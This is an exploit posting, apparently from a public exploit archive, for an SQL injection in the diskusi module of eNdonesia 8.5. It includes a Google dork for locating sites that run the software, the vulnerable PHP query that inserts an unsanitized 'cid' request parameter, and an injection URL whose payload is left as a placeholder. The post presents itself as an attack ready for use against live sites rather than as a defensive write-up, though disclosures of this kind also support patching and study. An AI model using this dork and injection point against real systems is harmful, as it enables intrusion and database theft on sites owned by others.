# Exploit Title: eNdonesia 8.5 (diskusi Module) SQL Injection Vulnerability # Google Dork: intext:powered by endonesia 8.5 # Date: 07/27/2012 # Author: Crim3R # download Link : http://nchc.dl.sourceforge.net/project/endonesia/eNdonesia/eNdonesia.8.5/endonesia.8.5.zip # Version: 8.5 # Tested on: win 7 ===============[Vuln Code]============= Vulnerability is in /127.0.0.1/eNdonesia/diskusi/diskusi.php function viewcat($cid, $min) mysql_query $result = mysql_query("select cid, title, parentid from mod_diskusi_categories where cid=$cid"); $cid = $_REQUEST['cid']; $Injection = http://127.0.0.1/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION] ===============Crim3R@Att.Net=========== $home = http://Secure-Land.net thanks to :  2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini and all Secure-land Members ...